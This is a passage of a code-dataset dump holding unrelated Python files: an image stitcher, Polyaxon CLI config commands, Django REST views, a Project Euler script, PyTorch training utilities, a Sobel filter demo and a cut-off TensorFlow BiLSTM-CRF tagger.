","sub_path":"moodledata/vpl_data/468/usersdata/292/111630/submittedfiles/Av2_Parte3.py","file_name":"Av2_Parte3.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"81993746","text":"import os\nimport collections\nfrom PIL import Image\nimport math\n\ntarget_dir = r\"O:\\Well Files Operated\\Mathews 2-8H\\Core\\Pictures\"\n# target_dir = r\"C:\\Users\\wnixon\\Documents\\GitHub\\stitchLogImages\\testImages\"\nout_folder = r\"O:\\Well Files Operated\\Mathews 2-8H\\Core\\MergedLogPhotos\"\nchunk_size = 50\n##FIGURE OUT A WAY TO DO THIS IN 50 PICTURE CHUNKS\n\nfor root, dirs, files in os.walk(target_dir):\n\tprint('''Reading Files From:\n\t\t\t\tROOT = {0}\n\t\t\t\tDIRS = {1}\n\t\t\t\tFILES = {2}'''.format(root, dirs, files))\n\nimages = {}\nfor item in files:\n\tprint (\"Item = {0}\".format(item))\n\tfilename, ext = os.path.splitext(os.path.basename(item))\n\tprint(\"Filename = {0} Ext = {1}\".format(filename, ext))\n\tif ext.lower() == \".jpg\":\n\t\tfilekey = int(filename.split('_')[1])\n\t\timages.setdefault(filekey, os.path.join(root,item))\n\norderedImages = collections.OrderedDict(sorted(images.items()))\n\t\nnumber_of_chunks = int(math.ceil(len(files) / chunk_size))\nprint(\"Number of Chunks = {0}\".format(number_of_chunks))\n\nimageList = []\nfor v in orderedImages.values():\n\timageList.append(v)\n\ndef chunks(l,n):\n\tfor i in xrange(0, len(l), n):\n\t\treturn [l[i:i+n] for i in range(0, len(l), n)]\n\nchunked_list = chunks(imageList, chunk_size)\nprint(chunked_list)\n\ni=0\nfor chunk in chunked_list:\n\tfilename = \"Matthews1-8_MergedCoreImages_Part_{0}.png\".format(i)\n\tout_file = os.path.join(out_folder, filename)\n\ti += 1\n\n\tImgM = {\"height\": 0, \"width\": 0, \"mode\": \"\"}\n\n\tfor item in chunk:\n\t\tprint(\"ITEM = {0}\".format(item))\n\t\timg = Image.open(item)\n\t\tImgM['width'] += img.size[0]\n\t\tif img.size[1] > ImgM['height']:\n\t\t\tImgM['height'] = img.size[1]\n\t\tImgM['mode'] = img.mode\n\t\t# if ImgM['mode'] != img.mode:\n\t\t\t# print(\"ImgM['height'] = {0} != img.mode = {1}\".format(ImgM['mode'],img.mode))\n\t\tdel img\n\t\n\tbigIm = Image.new(ImgM['mode'], (ImgM['width'],ImgM['height']))\n\n\tupperLeftX = 0\n\tupperLeftY = 0\n\n\tfor item2 in chunk:\n\t\timg2 = Image.open(item2)\n\n\t\tbigIm.paste(img2,(upperLeftX,upperLeftY))\n\t\tupperLeftX += img2.size[0]\n\t\t \n\t\tdel img2\n\n\tbigIm.save(out_file)\n\tprint(\"{0} saved\".format(out_file))\n\tdel bigIm\n\n","sub_path":"logStitcher.py","file_name":"logStitcher.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"250744442","text":"#!/usr/bin/python\n#\n# Copyright 2018-2022 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\n\nimport click\n\nfrom polyaxon.cli.errors import handle_cli_error\nfrom polyaxon.cli.session import set_versions_config\nfrom polyaxon.logger import 
from polyaxon.logger import clean_outputs\nfrom polyaxon.managers.auth import AuthConfigManager\nfrom polyaxon.managers.cli import CliConfigManager\nfrom polyaxon.managers.client import ClientConfigManager\nfrom polyaxon.managers.project import ProjectConfigManager\nfrom polyaxon.managers.run import RunConfigManager\nfrom polyaxon.managers.user import UserConfigManager\nfrom polyaxon.utils.formatting import Printer, dict_tabulate, dict_to_tabulate\n\n\ndef validate_options(ctx, param, value):\n    possible_values = [\"verbose\", \"host\"]\n    if value and value not in possible_values:\n        raise click.BadParameter(\n            \"Value `{}` is not supported, must be one of the values {}\".format(\n                value, possible_values\n            )\n        )\n    return value\n\n\n@click.group(invoke_without_command=True)\n@click.option(\n    \"--list\",\n    \"-l\",\n    \"_list\",\n    is_flag=True,\n    help=\"Deprecated, please use `polyaxon config show`.\",\n)\n@clean_outputs\ndef config(_list):  # pylint:disable=redefined-builtin\n    \"\"\"Set and get the global configurations.\"\"\"\n    if _list:\n        Printer.print_warning(\n            \"`polyaxon config -l` is deprecated, please use `polyaxon config show`!\"\n        )\n\n\n@config.command()\n@clean_outputs\ndef show():\n    \"\"\"Show the current cli, client, and user configs.\"\"\"\n    _config = ClientConfigManager.get_config_or_default()\n    Printer.print_heading(\"Client config:\")\n    dict_tabulate(_config.to_dict())\n    _config = CliConfigManager.get_config_or_default()\n    if _config:\n        Printer.print_heading(\"CLI config:\")\n        if _config.current_version:\n            Printer.print(\"Version {}\".format(_config.current_version))\n        else:\n            Printer.print_warning(\"This cli is not configured.\")\n        if _config.installation:\n            config_installation = dict_to_tabulate(\n                _config.installation,\n                humanize_values=True,\n                exclude_attrs=[\"hmac\", \"auth\", \"host\"],\n            )\n            Printer.print_heading(\"Platform config:\")\n            dict_tabulate(config_installation)\n        else:\n            Printer.print_warning(\"This cli is not connected to a Polyaxon Host.\")\n    _config = UserConfigManager.get_config_or_default()\n    if _config:\n        Printer.print_heading(\"User config:\")\n        config_user = dict_to_tabulate(\n            _config.to_dict(),\n            humanize_values=True,\n            exclude_attrs=[\"theme\"],\n        )\n        dict_tabulate(config_user)\n\n\n@config.command()\n@click.argument(\"keys\", type=str, nargs=-1)\n@clean_outputs\ndef get(keys):\n    \"\"\"Get the specific keys from the global configuration.\n\n    Examples:\n\n    \\b\n    $ polyaxon config get host verify-ssl\n    \"\"\"\n    _config = ClientConfigManager.get_config_or_default()\n\n    if not keys:\n        return\n\n    print_values = {}\n    for key in keys:\n        key = key.replace(\"-\", \"_\")\n        if hasattr(_config, key):\n            print_values[key] = getattr(_config, key)\n        else:\n            Printer.print(\"Key `{}` is not recognised.\".format(key))\n\n    dict_tabulate(print_values)\n\n\n@config.command()\n@click.option(\"--debug\", type=bool, help=\"To set the verbosity of the client.\")\n@click.option(\"--host\", type=str, help=\"To set the server endpoint.\")\n@click.option(\n    \"--no-api\",\n    type=bool,\n    help=\"To disable any API call.\",\n)\n@click.option(\n    \"--verify-ssl\",\n    type=bool,\n    help=\"To set whether or not to verify the SSL certificate.\",\n)\n@click.option(\n    \"--disable-errors-reporting\",\n    type=bool,\n    help=\"To disable errors reporting.\",\n)\n@click.option(\n    \"--no-purge\",\n    is_flag=True,\n    default=False,\n    help=\"To reconfigure the host without purging auth and other config options.\",\n)\n@clean_outputs\ndef set(**kwargs):  # pylint:disable=redefined-builtin\n    \"\"\"Set the global config values.\n\n
    Examples:\n\n    \\b\n    $ polyaxon config set --host=localhost\n    \"\"\"\n    try:\n        _config = ClientConfigManager.get_config_or_default()\n    except Exception as e:\n        handle_cli_error(e, message=\"Failed to load the Polyaxon configuration.\")\n        Printer.print_heading(\n            \"You can reset your config by running: `polyaxon config purge`\"\n        )\n        sys.exit(1)\n\n    should_purge = False\n    for key, value in kwargs.items():\n        if key == \"host\" and value is not None:\n            should_purge = True\n        if value is not None:\n            setattr(_config, key, value)\n\n    ClientConfigManager.set_config(_config)\n    Printer.print_success(\"Config was updated.\")\n    # Reset cli config\n    CliConfigManager.purge()\n    if should_purge and not kwargs.get(\"no_purge\"):\n        AuthConfigManager.purge()\n        UserConfigManager.purge()\n        set_versions_config()\n\n\n@config.command()\n@click.option(\n    \"--cache-only\",\n    is_flag=True,\n    help=\"To purge the cache only.\",\n)\n@clean_outputs\ndef purge(cache_only):\n    \"\"\"Purge the global config values.\"\"\"\n    if not cache_only:\n        ClientConfigManager.purge()\n        CliConfigManager.purge()\n        AuthConfigManager.purge()\n        UserConfigManager.purge()\n        ProjectConfigManager.purge()\n        RunConfigManager.purge()\n    Printer.print_success(\"Configs were removed.\")\n","sub_path":"core/polyaxon/cli/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"338979589","text":"from rest_framework import status, views, generics\nfrom rest_framework.response import Response\n\n\nfrom content import serializers as srlzr\nfrom content.permissions import ContentPermission, CategoryPermission\nfrom content.models import Content, Category\n\n\nclass ContentListCreateView(generics.ListCreateAPIView):\n\n    serializer_class = srlzr.ContentSerializer\n    permission_classes = (ContentPermission,)\n    queryset = Content.objects.all()\n\n    def post(self, request):\n        serializer = srlzr.CreateContentSerializer(data=request.DATA)\n        if serializer.is_valid():\n            content = Content.objects.create(\n                author_id=self.request.user.pk,\n                title=serializer.data.get('title'),\n                message=serializer.data.get('message'),\n                category_id=serializer.data.get('category'))\n            result = srlzr.CreateContentResponseSerializer()\n            result.data['url'] = content.get_absolute_url()\n\n            return Response(result.data, status=status.HTTP_201_CREATED)\n\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ContentDetailView(generics.RetrieveUpdateDestroyAPIView):\n\n    serializer_class = srlzr.ContentSerializer\n    permission_classes = (ContentPermission,)\n    queryset = Content.objects.all()\n\n\nclass CategoryListCreateView(generics.ListCreateAPIView):\n\n    permission_classes = (CategoryPermission,)\n    serializer_class = srlzr.CategorySerializer\n    queryset = Category.objects.all()\n\n\nclass CategoryDetailView(generics.RetrieveUpdateDestroyAPIView):\n\n    permission_classes = (CategoryPermission,)\n    serializer_class = srlzr.CategorySerializer\n    queryset = Category.objects.all()\n","sub_path":"knowdaledge/api/content_api.py","file_name":"content_api.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"615738111","text":"# -*- coding: utf-8 -*-\n\n\ndef isprime(n):\n    if n == 1 or n == 0:\n        return False\n    # the range starts at 2, and we only need to check up to the square root of n\n    for x in range(2, int(n**0.5)+1):\n        if n % x == 0:\n            return False\n    return True\n\n\n
def nextprime(n):\n    while not isprime(n+1):\n        n = n + 1\n    return n + 1\n\n\ndef lprimepower(limit):\n\n    p = 2\n    lprimes2 = []\n    lprimes3 = []\n    lprimes4 = []\n    exxit = False\n\n    while not exxit:\n        if p**2 < limit:\n            lprimes2.append(p**2)\n        else:\n            exxit = True\n\n        if p**3 < limit:\n            lprimes3.append(p**3)\n\n        if p**4 < limit:\n            lprimes4.append(p**4)\n\n        p = nextprime(p)\n\n    return lprimes2, lprimes3, lprimes4\n\n\ndef result():\n    limit = 50000000\n    l2, l3, l4 = lprimepower(limit)\n\n    # print(len(l2))\n    # print(len(l3))\n    # print(len(l4))\n\n    ltotal = []\n    count = 0\n    for i2 in l2:\n        count += 1\n        # if count % 10 == 0:\n        #     print(count)\n        for i3 in l3:\n            if i2+i3 > limit:\n                break\n            for i4 in l4:\n                zum = i2+i3+i4\n                if zum < limit:\n                    if zum not in ltotal:\n                        ltotal.append(zum)\n                else:\n                    break\n\n    # print('Result 0087:', len(ltotal))\n    return len(ltotal)\n","sub_path":"projecteuler/problems/d0075/p0087/r0087.py","file_name":"r0087.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"522156434","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/PYB11Generator/PYB11STLmethods.py\n# Compiled at: 2019-03-04 00:14:46\nimport inspect\nfrom PYB11utils import *\n\nclass PYB11_bind_vector:\n\n    def __init__(self, element, opaque=False, local=None):\n        self.element = element\n        self.opaque = opaque\n        self.local = local\n\n    def preamble(self, modobj, ss, name):\n        if self.opaque:\n            ss('PYBIND11_MAKE_OPAQUE(std::vector<' + PYB11CPPsafe(self.element) + '>)\\n')\n\n    def __call__(self, modobj, ss, name):\n        ss('py::bind_vector<std::vector<' + self.element + '>>(m, \"' + name + '\"')\n        if self.local is not None:\n            ss(', py::module_local(')\n            if self.local:\n                ss('true)')\n            else:\n                ss('false)')\n        ss(');\\n')\n        return\n\n\nclass PYB11_bind_map:\n\n    def __init__(self, key, value, opaque=False, local=None):\n        self.key = key\n        self.value = value\n        self.opaque = opaque\n        self.local = local\n\n    def preamble(self, modobj, ss, name):\n        if self.opaque:\n            cppname = 'std::map<' + self.key + ',' + self.value + '>'\n            ss('PYBIND11_MAKE_OPAQUE(' + PYB11CPPsafe(cppname) + ');\\n')\n\n    def __call__(self, modobj, ss, name):\n        ss('py::bind_map<std::map<' + self.key + ',' + self.value + '>>(m, \"' + name + '\"')\n        if self.local is not None:\n            ss(', py::module_local(')\n            if self.local:\n                ss('true)')\n            else:\n                ss('false)')\n        ss(');\\n')\n        return\n\n\ndef PYB11STLobjs(modobj):\n    return [ (name, obj) for name, obj in inspect.getmembers(modobj) if name[:5] != 'PYB11' and (isinstance(obj, PYB11_bind_vector) or isinstance(obj, PYB11_bind_map))\n           ]\n\n\ndef PYB11generateModuleSTL(modobj, ss):\n    stuff = PYB11STLobjs(modobj)\n    for name, obj in stuff:\n        ss('  ')\n        obj(modobj, ss, name)\n\n    ss('\\n')","sub_path":"pycfiles/PYB11Generator-1.0.11.tar/PYB11STLmethods.py","file_name":"PYB11STLmethods.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"500132138","text":"people = [{'first_name': 'Edward',\n           'last_name': 'Snowden',\n           'age': 27,\n           'city': 'Tokyo'},\n\n          {'first_name': 'Kevin',\n           'last_name': 'Mitnick',\n           'age': 32,\n           'city': 'Raleigh'},\n\n          {'first_name': 'Brian',\n           'last_name': 'Krebs',\n           'age': 48,\n           'city': 'New York City'}]\n\nfor person in people:\n
    print(f'''\n    First name: {person.get('first_name')}\n    Last name: {person.get('last_name')}\n    Age: {person.get('age')}\n    City: {person.get('city')}\n    ''')\n","sub_path":"chapter_06/6-07/people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"513594462","text":"\"\"\"\nMethods\n\nassertEqual(a, b)\nassertNotEqual(a, b)\nassertTrue(x)\nassertFalse(x)\nassertIs(a, b)\nassertIsNot(a, b)\nassertIsNone(x)\nassertIsNotNone(x)\nassertIn(a, b)\nassertNotIn(a, b)\nassertIsInstance(a, b)\nassertNotIsInstance(a, b)\n\"\"\"\nimport unittest\nimport pandas as pd\nimport numpy as np\nimport trikit\n\n\n\n# Ensure sample datasets have been properly loaded ----------------------------\n\nclass DatasetsTestCase(unittest.TestCase):\n\n    def setUp(self):\n        self.dactual = {\n            \"raa\"         :160987,\n            \"ta83\"        :34358090,\n            \"autoliab\"    :2197134,\n            \"glre\"        :56531053,\n            \"singinjury\"  :11026482.299999999,\n            \"singproperty\":25101206.26,\n            \"lrdb\"        :10178930,\n            \"amw09\"       :92741342.0,\n        }\n\n    def test_raa(self):\n        self.assertEqual(\n            trikit.load(\"raa\").value.sum(), self.dactual[\"raa\"],\n            \"Issue detected with raa sample dataset.\"\n        )\n\n    def test_ta83(self):\n        self.assertEqual(\n            trikit.load(\"ta83\").value.sum(), self.dactual[\"ta83\"],\n            \"Issue detected with ta83 sample dataset.\"\n        )\n\n    def test_autoliab(self):\n        self.assertEqual(\n            trikit.load(\"autoliab\").value.sum(), self.dactual[\"autoliab\"],\n            \"Issue detected with autoliab sample dataset.\"\n        )\n\n    def test_glre(self):\n        self.assertEqual(\n            trikit.load(\"glre\").value.sum(), self.dactual[\"glre\"],\n            \"Issue detected with glre sample dataset.\"\n        )\n\n    def test_singinjury(self):\n        self.assertEqual(\n            trikit.load(\"singinjury\").value.sum(), self.dactual[\"singinjury\"],\n            \"Issue detected with singinjury sample dataset.\"\n        )\n\n    def test_singproperty(self):\n        self.assertEqual(\n            trikit.load(\"singproperty\").value.sum(), self.dactual[\"singproperty\"],\n            \"Issue detected with singproperty sample dataset.\"\n        )\n\n    def test_amw09(self):\n        self.assertEqual(\n            trikit.load(\"amw09\").value.sum(), self.dactual[\"amw09\"],\n            \"Issue detected with amw09 sample dataset.\"\n        )\n\n    def test_lrdb(self):\n        self.assertEqual(\n            trikit.load_lrdb().value.sum(), self.dactual[\"lrdb\"],\n            \"Issue detected with lrdb sample dataset.\"\n        )\n\n\nif __name__ == \"__main__\":\n\n    unittest.main()","sub_path":"trikit/tests/test_datasets_ut.py","file_name":"test_datasets_ut.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"135406431","text":"# Copyright 2021, Flyreel. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ========================================================================\nimport torch\nimport numpy as np\nfrom tqdm import trange\nimport torch.nn.functional as F\nimport torchvision.transforms.functional as TF\nfrom collections import OrderedDict\nfrom itertools import combinations\nimport logging\nimport os, errno\n\n\ndef to_device(objects, device):\n objs = []\n for obj in objects:\n objs.append(obj.to(device))\n return objs\n\n\ndef forward_pass(model, x, y, device):\n x = x.to(device)\n y = y.to(device)\n outputs = model(x)\n loss = F.cross_entropy(outputs, y, reduction='mean')\n return outputs, loss\n\n\ndef sigmoid_rampup(curr_iter, rampup_iters):\n \"\"\"Exponential rampup from https://arxiv.org/abs/1610.02242\"\"\"\n if rampup_iters == 0:\n return 1.0\n else:\n current = np.clip(curr_iter, 0.0, rampup_iters)\n phase = 1.0 - current / rampup_iters\n return float(np.exp(-5.0 * phase * phase))\n\n\ndef train(model, train_loader, unlabeled_loader, optimizer, args):\n # Initialize history object to record and compute statistics\n history = HistoryDict()\n \n # Switch to train mode\n model.train()\n\n train_iterator = iter(train_loader)\n unlabeled_iterator = iter(unlabeled_loader)\n for _ in trange(args.epoch_over, desc=f'Train Epoch {args.curr_epoch}', position=2):\n adjust_polynomial_lr(optimizer, args)\n args.curr_iter += 1\n history.update('lr', optimizer.param_groups[0]['lr'], n=1)\n \n try:\n inputs_t, targets_t = next(train_iterator)\n inputs_u, targets_u = next(unlabeled_iterator)\n except StopIteration:\n train_iterator = iter(train_loader)\n unlabeled_iterator = iter(unlabeled_loader)\n inputs_t, targets_t = next(train_iterator)\n inputs_u, targets_u = next(unlabeled_iterator)\n \n # Forward pass\n inputs_t, targets_t, inputs_u, targets_u = to_device(\n (inputs_t, targets_t, inputs_u, targets_u), device=args.device\n )\n outputs_t, outputs_u = model(inputs_t, inputs_u)\n \n loss_weight = args.loss_weight * sigmoid_rampup(args.curr_iter, args.stop_rampup)\n \n loss_t = F.cross_entropy(outputs_t, targets_t, reduction='mean')\n loss_u = F.cross_entropy(outputs_u, targets_u, reduction='mean')\n loss = loss_t + loss_u * loss_weight\n\n # Backprop\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n # Measure accuracy and record statistics\n acc, batch_size = accuracy(outputs_t.data, targets_t, topk=(1,))\n history.update('training loss', loss.item(), n=batch_size)\n history.update('training top1 accuracy', acc[0], n=batch_size)\n history.update('self-supervised weight', loss_weight, n=1)\n \n logging.info(\n 'Train Loss: {history[training loss].avg:.4f} '\n 'Train Acc: {history[training top1 accuracy].avg:.4f} '\n 'LR: {history[lr].value:.6f} '\n 'loss_w: {history[self-supervised weight].value:.2f}'.format(history=history)\n )\n\n\ndef evaluate(model, val_loader, args):\n # Initialize history object to record and compute statistics\n history = HistoryDict()\n\n # Switch to evaluate mode\n 
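# note (editor's addition): eval() turns off dropout and uses the running\n    # batch-norm statistics, so repeated validation passes over the same data\n    # give identical metrics\n    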
model.eval()\n\n val_iterator = iter(val_loader)\n for _ in trange(len(val_loader), desc=f'Val Epoch {args.curr_epoch}', position=2):\n inputs, targets = next(val_iterator)\n \n # Forward pass\n outputs, loss = forward_pass(model, inputs, targets, args.device)\n\n # measure accuracy and record loss\n acc, batch_size = accuracy(outputs.data, targets, topk=(1,))\n history.update('validation loss', loss.item(), n=batch_size)\n history.update('validation top1 accuracy', acc[0], n=batch_size)\n \n logging.info(\n 'Valid Loss: {history[validation loss].avg:.4f} '\n 'Valid Acc: {history[validation top1 accuracy].avg:.4f} '\n 'Valid Counts: {history[validation loss].count:d}'.format(history=history)\n )\n return history\n\n\nclass History():\n \"\"\"Compute and store history statistics\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.value = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, value, n=1):\n self.value = value\n self.sum += value * n\n self.count += n\n self.avg = self.sum / self.count\n\n\nclass HistoryDict():\n def __init__(self):\n self.history = {}\n\n def __getitem__(self, key):\n return self.history[key]\n\n def update(self, name, value, n=1):\n if not name in self.history:\n self.history[name] = History()\n self.history[name].update(value, n)\n\n def reset(self):\n for value in self.history.values():\n value.reset()\n\n def values(self, postfix=''):\n return {name + postfix: value.value for name, value in self.history.items()}\n\n def averages(self, postfix='/avg'):\n return {name + postfix: value.avg for name, value in self.history.items()}\n\n def sums(self, postfix='/sum'):\n return {name + postfix: value.sum for name, value in self.history.items()}\n\n def counts(self, postfix='/count'):\n return {name + postfix: value.count for name, value in self.history.items()}\n\n\nclass GammaCorrection():\n def __init__(self, r=(0.5, 2.0)):\n self.gamma_range = r\n \n def __call__(self, x):\n gamma = np.random.uniform(*self.gamma_range)\n return TF.adjust_gamma(x, gamma, gain=1)\n\n def __repr__(self):\n return self.__class__.__name__ + '(r={})'.format(self.gamma_range)\n\n \ndef adjust_polynomial_lr(optimizer, args):\n \"\"\"Decay learning rate according to polynomial schedule with warmup\"\"\"\n if args.curr_iter < args.warmup_iters:\n frac = args.curr_iter / args.warmup_iters\n step = args.lr - args.warmup_lr\n args.running_lr = args.warmup_lr + step * frac\n else:\n frac = (float(args.curr_iter) - args.warmup_iters) / (args.max_iters - args.warmup_iters)\n scale_running_lr = max((1.0 - frac), 0.) 
** args.lr_pow\n args.running_lr = args.lr * scale_running_lr\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = args.running_lr\n \n \ndef accuracy(output, target, topk=(1,)):\n \"\"\"Compute topk accuracy\"\"\"\n output = output.cpu()\n target = target.cpu()\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return (res, batch_size)\n\n\ndef save_model(model, args, path):\n state_dict = OrderedDict({\n 'meta': args.__dict__,\n 'model_params': {\n 'backbone': model.module.backbone,\n 'pretrained': model.module.pretrained,\n 'num_labeled_classes': model.module.num_labeled_classes,\n 'num_unlabeled_classes': model.module.num_unlabeled_classes,\n 'dropout_rate': model.module.dropout_rate,\n 'global_pool': model.module.global_pool,\n },\n 'state_dict': model.module.state_dict(),\n })\n torch.save(state_dict, path)\n logging.info('=> Model checkpoint saved to {:s}'.format(path))\n\n\ndef load_model(Model, checkpoint_path, device):\n checkpoint = torch.load(checkpoint_path, map_location=device)\n checkpoint['model_params']['pretrained'] = False\n model = Model(**checkpoint['model_params'])\n model.load_state_dict(checkpoint['state_dict'])\n model.CLASSES = checkpoint['meta']['classes']\n return model.to(device)\n\n\ndef assert_same_classes(datasets):\n if len(datasets) == 1:\n return True\n same_classes = [x.class_to_idx == y.class_to_idx for x, y in combinations(datasets, r=2)]\n assert all(same_classes), \\\n f'The following have mismatched subdirectory names. Check the `Root location`.\\n{datasets}'\n\n\ndef validate_paths(paths):\n for path in paths:\n if not os.path.exists(path):\n raise FileNotFoundError(\n errno.ENOENT, os.strerror(errno.ENOENT), path\n )\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"96434232","text":"import cv2\nimport numpy as np\nscale = 1\ndelta = 0\nddepth = cv2.CV_16S\nimg = cv2.imread('liver.jpg')\nimg = cv2.GaussianBlur(img,(3,3),0)\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n# Gradient-X\ngrad_x = cv2.Sobel(gray,ddepth,1,0,ksize = 3, scale = scale, delta = delta,borderType = cv2.BORDER_DEFAULT)\n#grad_x = cv2.Scharr(gray,ddepth,1,0)\n# Gradient-Y\ngrad_y = cv2.Sobel(gray,ddepth,0,1,ksize = 3, scale = scale, delta = delta, borderType = cv2.BORDER_DEFAULT)\n#grad_y = cv2.Scharr(gray,ddepth,0,1)\nabs_grad_x = cv2.convertScaleAbs(grad_x) # converting back to uint8\nabs_grad_y = cv2.convertScaleAbs(grad_y)\ndst = cv2.addWeighted(abs_grad_x,0.5,abs_grad_y,0.5,0)\n#dst = cv2.add(abs_grad_x,abs_grad_y)\ncv2.imshow('dst',dst)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n# To see the results, visit : http://opencvpython.blogspot.com/2012/06/image-derivatives-sobel-and-scharr.html\n","sub_path":"Thammu/sobs.py","file_name":"sobs.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"457189045","text":"\"\"\"\n\n@file : 001-rnn+lstm+crf.py\n\n@author: xiaolu\n\n@time : 2019-09-06\n\n\"\"\"\nimport re\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import classification_report\n\n\nclass Model:\n def __init__(self, dim_word, dim_char, dropout, 
learning_rate,\n                 hidden_size_char, hidden_size_word, num_layers):\n        '''\n        :param dim_word: dimension of the word embeddings\n        :param dim_char: dimension of the character embeddings\n        :param dropout: keep probability used by the dropout wrappers\n        :param learning_rate: learning rate\n        :param hidden_size_char: hidden size of the character-level LSTM\n        :param hidden_size_word: hidden size of the word-level LSTM\n        :param num_layers: number of stacked BiLSTM layers\n        '''\n        def cells(size, reuse=False):\n            return tf.contrib.rnn.DropoutWrapper(\n                tf.nn.rnn_cell.LSTMCell(size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n                output_keep_prob=dropout\n            )\n\n        # 1. define input\n        self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n        self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n        self.labels = tf.placeholder(tf.int32, shape=[None, None])\n        self.maxlen = tf.shape(self.word_ids)[1]\n        self.lengths = tf.count_nonzero(self.word_ids, 1)\n\n        # 2. embedding\n        self.word_embeddings = tf.Variable(tf.truncated_normal([len(word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n        self.char_embeddings = tf.Variable(tf.truncated_normal([len(char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n        word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.word_ids)\n        char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.char_ids)\n\n        s = tf.shape(char_embedded)  # (51312, 50, 27, embedding_size)\n        char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2], dim_char])\n\n        for n in range(num_layers):\n            (out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn(\n                cell_fw=cells(hidden_size_char),\n                cell_bw=cells(hidden_size_char),\n                inputs=char_embedded,\n                dtype=tf.float32,\n                scope='bidirectional_rnn_char_%d' % n\n            )\n            char_embedded = tf.concat((out_fw, out_bw), 2)\n\n        output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2*hidden_size_char])\n        word_embedded = tf.concat([word_embedded, output], axis=-1)  # concatenate the word embeddings with the BiLSTM encoding of the characters\n\n        for n in range(num_layers):\n            (out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn(\n                cell_fw=cells(hidden_size_word),\n                cell_bw=cells(hidden_size_word),\n                inputs=word_embedded,\n                dtype=tf.float32,\n                scope='bidirectional_rnn_word_%d' % n\n            )\n            word_embedded = tf.concat((out_fw, out_bw), 2)\n\n        logits = tf.layers.dense(word_embedded, len(idx2tag))\n\n        y_t = self.labels\n        log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n            logits, y_t, self.lengths\n        )\n\n        self.cost = tf.reduce_mean(-log_likelihood)\n        self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.cost)\n        mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n\n        self.tags_seq, tags_score = tf.contrib.crf.crf_decode(\n            logits, transition_params, self.lengths\n        )\n\n        self.tags_seq = tf.identity(self.tags_seq, name='logits')\n\n        y_t = tf.cast(y_t, tf.int32)\n\n        self.prediction = tf.boolean_mask(self.tags_seq, mask)\n        mask_label = tf.boolean_mask(y_t, mask)\n\n        correct_pred = tf.equal(self.prediction, mask_label)\n        correct_index = tf.cast(correct_pred, tf.float32)\n        self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n   